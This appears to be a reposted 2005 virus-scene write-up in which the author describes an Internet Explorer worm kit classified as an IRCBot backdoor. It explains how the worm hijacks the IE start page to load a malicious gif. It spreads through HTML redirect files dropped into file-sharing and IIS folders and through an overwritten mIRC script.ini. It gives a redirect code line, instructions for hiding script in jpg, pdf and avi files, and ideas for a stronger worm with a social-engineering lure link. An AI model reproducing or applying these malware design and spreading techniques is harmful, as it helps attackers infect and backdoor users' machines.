IE Media Files worm kit

IE Media Files w0rm kit
(Backdoor.Win32.IRCBot.mw)
(Backdoor.Win32.IRCBot.on)
by dav
Written in Delphi
Released in December 2005

Intro

Sven Vetsch found a cross site scripting vulnerability at Microsoft Internet Explorer.
Its possible to run arbitrary script code. The problem lies in the handling of the content of such files. 
In the first place the usual file header (e.g. Gif) is provided. The remaining content of the file 
could be usual html data -> + javascript/visual basic script (VBS, ActiveX must be enabled!)
 Worm Description

My w0rm defines a new IE start page. If the victim starts IE, IE will always load the w0rm.gif 
(on my webserver) -> w0rm start routine! 
Unfortunately the gif bug only works when IE streams the gif from a web server over HTTP or HTTPS!
The malicious gif can't be executed locally or included in other html pages. Therefore i had to write 
a new spreading technique. It makes no sense to drop a copy of the w0rm. So I decided that my w0rm 
creates html files on the victim machine with one meta tag line ->
	w.WriteLine "<meta http-equiv='refresh' content='0;URL=" & url & "'>" 
The idea is simple. Drop html files including redirection to our webserver and spread these html files 
over file sharing folders (kazaa, p2p) and IIS (if installed). Also my w0rm overwrites (if exist) the 
mirc script.ini with some new lines. Why no dcc spreading script? Simply because the chance is much higher
that the w0rm infects more machines by sending the link across irc instead of sending html files.




Malicious JPG, PDF, PNG, AVI, ...

Its possible to put/hide your w0rm in every file (jpg, gif, pdf, png, avi,...). I tried it and it works! (all IE)
Open your notepad and type:
	<script type="text/javascript">alert("the vx scene never dies!")</script>
Save it as *.jpg, *.pdf, ... ;) 
It isn't necessary to write the usual file header (e.g. Gif) in the first place!
Just put your js/vbs c0de in such a file, upload and... :).



New Idea

I guess you noticed that my sample script is not exactly a real w0rm but, 
we could write a w0rm with the following features:

- the w0rm drops a copy of itself as jpg, gif, pdf, png, avi, ... and a binary version of 
a simple webserver in itself (with chr())
- spreading the hosts ip over mail?/irc/im?
  -> e.g. "hey buddy look at this :D, http://192.168.172.23/sexy/blondfuck.avi"

dav



tested on Windows XP
February 17, 2007
MegaSecurity